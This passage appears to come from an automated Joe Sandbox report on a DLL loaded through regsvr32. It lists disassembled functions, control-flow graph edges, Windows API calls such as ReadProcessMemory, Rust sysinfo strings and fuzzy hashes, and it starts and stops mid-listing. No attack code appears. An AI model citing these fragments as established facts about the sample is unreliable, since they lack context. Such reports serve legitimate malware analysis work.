2652->2644 2658 7ffdfb2a8538-7ffdfb2a853b 2653->2658 2654->2658 2655->2654 2655->2658 2656->2655 2659 7ffdfb2a84e4-7ffdfb2a84ee GetLastError 2656->2659 2658->2617 2659->2655 2661 7ffdfb2a84f0-7ffdfb2a8511 SetFileInformationByHandle 2659->2661 2661->2655 2662 7ffdfb2a8597-7ffdfb2a85b2 GetLastError CloseHandle 2661->2662 2663 7ffdfb2a85c8-7ffdfb2a85d0 2662->2663 2664 7ffdfb2a85b4-7ffdfb2a85c3 call 7ffdfb20a8e0 2662->2664 2663->2617 2664->2663
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 3463825546-0
                                                                    • Opcode ID: fa647eda8c91a7695ec1f37dd5fdc2b06cb930c9a972b8361209d69e79ea7fba
                                                                    • Instruction ID: 090836f11bc24bf1d03a9a24c9e58f21ed398a811d4375ea3eea86c2896cd951
                                                                    • Opcode Fuzzy Hash: fa647eda8c91a7695ec1f37dd5fdc2b06cb930c9a972b8361209d69e79ea7fba
                                                                    • Instruction Fuzzy Hash: FE61F691F0E65356FB2596219420BB92BE8AF05BD8F184131CEAD8F7EDDE3CD8468701
                                                                    Function 00007FFDFB2AEC20 Relevance: 9.2, APIs: 6, Instructions: 162COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2666 7ffdfb2aec20-7ffdfb2aec58 call 7ffdfb2aeec0 2669 7ffdfb2aec67-7ffdfb2aec9a call 7ffdfb2aeec0 2666->2669 2670 7ffdfb2aec5a-7ffdfb2aec62 CloseHandle 2666->2670 2674 7ffdfb2aeca0-7ffdfb2aecd8 2669->2674 2675 7ffdfb2aee61-7ffdfb2aee65 call 7ffdfb26cdb0 2669->2675 2671 7ffdfb2aee6a-7ffdfb2aee7c 2670->2671 2676 7ffdfb2aece0-7ffdfb2aecf9 call 7ffdfb3023cc 2674->2676 2675->2671 2680 7ffdfb2aecfb-7ffdfb2aecfd 2676->2680 2681 7ffdfb2aed40-7ffdfb2aed47 2676->2681 2682 7ffdfb2aee48-7ffdfb2aee4d GetLastError 2680->2682 2683 7ffdfb2aed03-7ffdfb2aed0a 2680->2683 2684 7ffdfb2aee15-7ffdfb2aee1b call 7ffdfb2aefa0 2681->2684 2685 7ffdfb2aed4d-7ffdfb2aed50 2681->2685 2688 7ffdfb2aee50-7ffdfb2aee54 2682->2688 2686 7ffdfb2aed10-7ffdfb2aed13 2683->2686 2687 7ffdfb2aed9e-7ffdfb2aeda4 call 7ffdfb2aefa0 2683->2687 2699 7ffdfb2aee20-7ffdfb2aee24 2684->2699 2689 7ffdfb2aed5b-7ffdfb2aed7a GetOverlappedResult 2685->2689 2690 7ffdfb2aed52-7ffdfb2aed56 2685->2690 2693 7ffdfb2aed15-7ffdfb2aed34 GetOverlappedResult 2686->2693 2694 7ffdfb2aed81 2686->2694 2702 7ffdfb2aeda9-7ffdfb2aedad 2687->2702 2695 7ffdfb2aee58-7ffdfb2aee5c call 7ffdfb26cdb0 2688->2695 2697 7ffdfb2aed7c-7ffdfb2aed7f 2689->2697 2698 7ffdfb2aedd9-7ffdfb2aede1 GetLastError 2689->2698 2696 7ffdfb2aee00-7ffdfb2aee13 2690->2696 2703 7ffdfb2aed3a-7ffdfb2aed3d 2693->2703 2704 7ffdfb2aedbf-7ffdfb2aedc7 GetLastError 2693->2704 2709 7ffdfb2aed85-7ffdfb2aed98 2694->2709 2695->2675 2696->2684 2708 7ffdfb2aee3b-7ffdfb2aee46 call 7ffdfb2af0b0 2696->2708 2697->2696 2705 7ffdfb2aedf7-7ffdfb2aedf9 2698->2705 2706 7ffdfb2aede3-7ffdfb2aedef 2698->2706 2700 7ffdfb2aee26-7ffdfb2aee2a 2699->2700 2701 7ffdfb2aee32-7ffdfb2aee36 2699->2701 2700->2676 2710 7ffdfb2aee30 2700->2710 2701->2695 2702->2701 2711 7ffdfb2aedb3-7ffdfb2aedb7 2702->2711 2703->2709 2712 7ffdfb2aedc9-7ffdfb2aedd5 2704->2712 2713 7ffdfb2aedf3-7ffdfb2aedf5 2704->2713 2705->2696 2706->2696 2715 7ffdfb2aedf1 2706->2715 2708->2695 2709->2687 2716 7ffdfb2aee38 2709->2716 2710->2708 2711->2676 2717 7ffdfb2aedbd 2711->2717 2712->2709 2718 7ffdfb2aedd7 2712->2718 2713->2709 2715->2688 2716->2708 2717->2716 2718->2688
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateEventHandleOverlappedResult
                                                                    • String ID:
                                                                    • API String ID: 3756958029-0
                                                                    • Opcode ID: 0ac5af106a73d8143591ed08cd212933c0e4614fbfce0bbc79ddda803c71490c
                                                                    • Instruction ID: a439e0cba35e8800e932d4cc44066a6c1c03e7cc9c2f88bfa7651e90afcd5631
                                                                    • Opcode Fuzzy Hash: 0ac5af106a73d8143591ed08cd212933c0e4614fbfce0bbc79ddda803c71490c
                                                                    • Instruction Fuzzy Hash: 4661AA22F09A4399FB10BA7585617FC1BA4AF147D8F240531DE1D9ABEDDF28D5878340
                                                                    Function 00007FFDFB20C160 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 211COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs
                                                                    • API String ID: 0-1373735107
                                                                    • Opcode ID: c5f7fa2330461c43e2abd6da7f8019c563dceb6ff5d3f9ebfd521dec14973f29
                                                                    • Instruction ID: b38b58083ac2b4e6ef287b591938bd46394cadadaa9fc0b5bd9a13137cc2e882
                                                                    • Opcode Fuzzy Hash: c5f7fa2330461c43e2abd6da7f8019c563dceb6ff5d3f9ebfd521dec14973f29
                                                                    • Instruction Fuzzy Hash: 69B1C122A29BC282E7618B28E4517FBA360FBD5344F109325EBD942BD9DF7DD1858740
                                                                    Function 00007FFDFB220280 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 401COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2764 7ffdfb220280-7ffdfb2202b0 2765 7ffdfb2202b6-7ffdfb2202c8 PdhCollectQueryData 2764->2765 2766 7ffdfb2203e8-7ffdfb220408 call 7ffdfb301ebc 2764->2766 2768 7ffdfb2202ef-7ffdfb220300 call 7ffdfb20f280 2765->2768 2769 7ffdfb2202ca-7ffdfb2202d8 call 7ffdfb20ef30 2765->2769 2774 7ffdfb22040a-7ffdfb220414 2766->2774 2775 7ffdfb22041b-7ffdfb220432 call 7ffdfb243c60 call 7ffdfb20e670 2766->2775 2777 7ffdfb220302-7ffdfb220320 2768->2777 2778 7ffdfb220361-7ffdfb220364 2768->2778 2782 7ffdfb2202de-7ffdfb2202ea 2769->2782 2783 7ffdfb220802-7ffdfb220815 call 7ffdfb2eb5a0 2769->2783 2779 7ffdfb220461-7ffdfb220473 call 7ffdfb20ed90 2774->2779 2780 7ffdfb220416 2774->2780 2796 7ffdfb22081a-7ffdfb220841 call 7ffdfb2ebcd0 2775->2796 2810 7ffdfb220438-7ffdfb22045b 2775->2810 2785 7ffdfb22033a-7ffdfb22033d 2777->2785 2786 7ffdfb2205d7-7ffdfb2205f2 2778->2786 2787 7ffdfb22036a-7ffdfb22036e 2778->2787 2788 7ffdfb220589-7ffdfb2205d5 2779->2788 2798 7ffdfb220479-7ffdfb2204ab 2779->2798 2780->2788 2782->2768 2783->2796 2793 7ffdfb220330-7ffdfb220338 2785->2793 2794 7ffdfb22033f-7ffdfb22034c call 7ffdfb20ef30 2785->2794 2787->2786 2795 7ffdfb220374-7ffdfb220392 call 7ffdfb20fe90 2787->2795 2788->2786 2792 7ffdfb2205f3-7ffdfb22060f call 7ffdfb20a8d0 2788->2792 2809 7ffdfb220846-7ffdfb220850 call 7ffdfb2deab0 2792->2809 2812 7ffdfb220615-7ffdfb220662 call 7ffdfb20a8d0 2792->2812 2793->2778 2793->2785 2813 7ffdfb220352-7ffdfb22035f 2794->2813 2814 7ffdfb2207ea-7ffdfb2207fd call 7ffdfb2eb5a0 2794->2814 2815 7ffdfb220394-7ffdfb2203ab 2795->2815 2816 7ffdfb2203cb-7ffdfb2203ce 2795->2816 2796->2809 2804 7ffdfb2204b1-7ffdfb2204c5 2798->2804 2805 7ffdfb220535-7ffdfb22056b 2798->2805 2811 7ffdfb2204df-7ffdfb2204e2 2804->2811 2805->2788 2817 7ffdfb22056d-7ffdfb220584 call 7ffdfb20a8e0 2805->2817 2820 7ffdfb220855-7ffdfb2208fc call 7ffdfb2deab0 call 7ffdfb20a8e0 call 7ffdfb302850 call 7ffdfb2194a0 call 7ffdfb302850 call 7ffdfb2eba00 2809->2820 2810->2779 2810->2788 2823 7ffdfb22050e-7ffdfb220522 2811->2823 2824 7ffdfb2204e4 2811->2824 2812->2820 2837 7ffdfb220668-7ffdfb2206b1 call 7ffdfb222a60 call 7ffdfb20f280 2812->2837 2813->2793 2814->2783 2827 7ffdfb2203b0-7ffdfb2203b3 2815->2827 2821 7ffdfb2203d0-7ffdfb2203da call 7ffdfb20a8e0 2816->2821 2822 7ffdfb2203df-7ffdfb2203e3 2816->2822 2817->2788 2863 7ffdfb2208fe-7ffdfb220901 call 7ffdfb302850 2820->2863 2864 7ffdfb220906-7ffdfb220949 call 7ffdfb20a8e0 call 7ffdfb302850 2820->2864 2821->2822 2822->2786 2833 7ffdfb2204d0-7ffdfb2204dd 2823->2833 2834 7ffdfb220524-7ffdfb220533 call 7ffdfb20a8e0 2823->2834 2831 7ffdfb2204f0-7ffdfb22050a 2824->2831 2827->2816 2828 7ffdfb2203b5-7ffdfb2203c9 2827->2828 2828->2816 2828->2827 2831->2831 2836 7ffdfb22050c 2831->2836 2833->2805 2833->2811 2834->2833 2836->2823 2847 7ffdfb2206b6-7ffdfb2206c2 2837->2847 2849 7ffdfb2206c8-7ffdfb2206e8 2847->2849 2850 7ffdfb2207cb-7ffdfb2207df 2847->2850 2853 7ffdfb2206f0-7ffdfb2207c5 call 7ffdfb2e0010 * 2 call 7ffdfb222a60 2849->2853 2850->2765 2851 7ffdfb2207e5 2850->2851 2851->2786 2853->2850 2863->2864 2872 7ffdfb22095c-7ffdfb220974 call 7ffdfb224840 2864->2872 2873 7ffdfb22094b 2864->2873 2878 7ffdfb220976-7ffdfb220984 call 7ffdfb20a8e0 2872->2878 2879 7ffdfb220989-7ffdfb2209be 2872->2879 2873->2872 2874 7ffdfb22094d-7ffdfb220957 call 7ffdfb20a8e0 2873->2874 2874->2872 2878->2879
                                                                    APIs
                                                                    Strings
                                                                    • global_key_idle disappearedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\system.rs, xrefs: 00007FFDFB220802
                                                                    • key_used disappeared, xrefs: 00007FFDFB2207EA
                                                                    • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 00007FFDFB220826
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CollectDataQuery
                                                                    • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs$global_key_idle disappearedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\system.rs$key_used disappeared
                                                                    • API String ID: 777096026-328276081
                                                                    • Opcode ID: 453ddf9edeeb583c801d8fc90883f689bf0d6e275f5c04062410226dc8c6ab7a
                                                                    • Instruction ID: 65039e16fe7a7d53095c8ed546cea610c314ae972144d34586f68420e2426eb5
                                                                    • Opcode Fuzzy Hash: 453ddf9edeeb583c801d8fc90883f689bf0d6e275f5c04062410226dc8c6ab7a
                                                                    • Instruction Fuzzy Hash: 7902B226B0AB8381F7509B21E4617AA77A0FB85B94F944135EEAD877E9DF7CE045C300
                                                                    Function 00007FFDFB2AEEC0 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$CreateErrorEventLast
                                                                    • String ID:
                                                                    • API String ID: 3743700123-0
                                                                    • Opcode ID: 187fd84782cf0cb99c379f745ced377e887223e323960078e0587435b871c7fe
                                                                    • Instruction ID: a7a2083673178a59781de5daa898e1f9ac419b5f18b1ccb44281d3b9e17867de
                                                                    • Opcode Fuzzy Hash: 187fd84782cf0cb99c379f745ced377e887223e323960078e0587435b871c7fe
                                                                    • Instruction Fuzzy Hash: 8F11B722B4AB0356F7196B12A561B792690FF88794F184134EEAC47BD5EF3CA4E28300
                                                                    Function 00007FFDFB20DDF0 Relevance: 4.7, APIs: 3, Instructions: 180timeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$ProcessTimes
                                                                    • String ID:
                                                                    • API String ID: 3369102921-0
                                                                    • Opcode ID: debd1675c3c39d47079517bf0f8391c329cbe455144f0d50b94dce6023240213
                                                                    • Instruction ID: 50153035a9b8d38f3d92a04a5a631282d38c2e0cdba321963cb2ca90d661c109
                                                                    • Opcode Fuzzy Hash: debd1675c3c39d47079517bf0f8391c329cbe455144f0d50b94dce6023240213
                                                                    • Instruction Fuzzy Hash: 3F81C37270ABC691E7219B15E444BAAB764FB99BC4F444226EEDC53BA9DF3CC144C700
                                                                    Function 00007FFDFB25BA70 Relevance: 3.8, APIs: 3, Instructions: 65COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CBB9
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC20
                                                                    • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC30
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC8C
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID:
                                                                    • API String ID: 3702945584-0
                                                                    • Opcode ID: facdd1d30bccc6831c85d12e0ebd297498cc88624c2147c8a7189ade048d0423
                                                                    • Instruction ID: 210869a62de7bcf3dd5ffa3464d675dd295047a688337f6d0a782cc982acebdc
                                                                    • Opcode Fuzzy Hash: facdd1d30bccc6831c85d12e0ebd297498cc88624c2147c8a7189ade048d0423
                                                                    • Instruction Fuzzy Hash: A921B322B0A64741FF056A199534BB963D1AF45FC4F088135CD6C8B7EEDE6DA4428380
                                                                    Function 00007FFDFB21F640 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 229COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3854 7ffdfb21f640-7ffdfb21f669 3855 7ffdfb21f77f-7ffdfb21f7e1 call 7ffdfb2deab0 call 7ffdfb20a8e0 call 7ffdfb302850 3854->3855 3856 7ffdfb21f66f-7ffdfb21f67c 3854->3856 3876 7ffdfb21f7fd-7ffdfb21f809 3855->3876 3877 7ffdfb21f7e3-7ffdfb21f7ea 3855->3877 3856->3855 3858 7ffdfb21f682-7ffdfb21f6ab call 7ffdfb20a8d0 3856->3858 3858->3855 3863 7ffdfb21f6b1-7ffdfb21f6da ReadProcessMemory 3858->3863 3865 7ffdfb21f6fc-7ffdfb21f716 call 7ffdfb255f90 3863->3865 3866 7ffdfb21f6dc-7ffdfb21f6e1 3863->3866 3878 7ffdfb21f722-7ffdfb21f72e 3865->3878 3879 7ffdfb21f718-7ffdfb21f71d call 7ffdfb256b10 3865->3879 3868 7ffdfb21f730-7ffdfb21f735 3866->3868 3869 7ffdfb21f6e3-7ffdfb21f6fa 3866->3869 3875 7ffdfb21f73c-7ffdfb21f766 call 7ffdfb20a8e0 3868->3875 3872 7ffdfb21f76b-7ffdfb21f77e 3869->3872 3875->3872 3884 7ffdfb21f839-7ffdfb21f841 3876->3884 3885 7ffdfb21f80b-7ffdfb21f811 3876->3885 3881 7ffdfb21f826-7ffdfb21f837 3877->3881 3882 7ffdfb21f7ec-7ffdfb21f7f9 3877->3882 3878->3875 3879->3878 3881->3884 3881->3885 3882->3885 3888 7ffdfb21f7fb 3882->3888 3886 7ffdfb21f971-7ffdfb21f983 3884->3886 3887 7ffdfb21f847-7ffdfb21f856 call 7ffdfb21f640 3884->3887 3885->3887 3889 7ffdfb21f813-7ffdfb21f81f 3885->3889 3892 7ffdfb21f85b-7ffdfb21f863 3887->3892 3888->3884 3889->3887 3891 7ffdfb21f821 3889->3891 3891->3886 3893 7ffdfb21f865-7ffdfb21f86b 3892->3893 3894 7ffdfb21f889-7ffdfb21f896 3892->3894 3895 7ffdfb21f86d-7ffdfb21f870 3893->3895 3896 7ffdfb21f881-7ffdfb21f884 3893->3896 3897 7ffdfb21f8b6 3894->3897 3898 7ffdfb21f898-7ffdfb21f89f 3894->3898 3895->3896 3899 7ffdfb21f872-7ffdfb21f87c call 7ffdfb20a8e0 3895->3899 3896->3886 3901 7ffdfb21f8b9-7ffdfb21f8f7 call 7ffdfb29b9f0 call 7ffdfb2b7970 call 7ffdfb21f360 3897->3901 3900 7ffdfb21f8a0-7ffdfb21f8a6 3898->3900 3899->3896 3900->3901 3903 7ffdfb21f8a8-7ffdfb21f8af 3900->3903 3911 7ffdfb21f93e-7ffdfb21f946 3901->3911 3912 7ffdfb21f8f9-7ffdfb21f913 3901->3912 3903->3900 3906 7ffdfb21f8b1-7ffdfb21f8b4 3903->3906 3906->3901 3915 7ffdfb21f958-7ffdfb21f95b 3911->3915 3916 7ffdfb21f948-7ffdfb21f953 call 7ffdfb20a8e0 3911->3916 3913 7ffdfb21f915-7ffdfb21f918 3912->3913 3914 7ffdfb21f929-7ffdfb21f93c 3912->3914 3913->3914 3917 7ffdfb21f91a-7ffdfb21f924 call 7ffdfb20a8e0 3913->3917 3914->3915 3915->3886 3919 7ffdfb21f95d-7ffdfb21f96c call 7ffdfb20a8e0 3915->3919 3916->3915 3917->3914 3919->3886
                                                                    APIs
                                                                    Strings
                                                                    • ReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\process.rs, xrefs: 00007FFDFB21F735
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID: ReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\process.rs
                                                                    • API String ID: 1726664587-463925288
                                                                    • Opcode ID: 9e91fe6fbcf09cca1b6138462308769329588dadde7ab4543284a0c8432d20a4
                                                                    • Instruction ID: 8658a7cc62d35853634408dcade709a591ac53f75002efb5f28b85cb4a56d4bc
                                                                    • Opcode Fuzzy Hash: 9e91fe6fbcf09cca1b6138462308769329588dadde7ab4543284a0c8432d20a4
                                                                    • Instruction Fuzzy Hash: 9F81D622B0E69391E7219B119421BBA63A1BF457D0F449630EEBD877EDDF3DD6428700
                                                                    Function 00007FFDFB220A20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
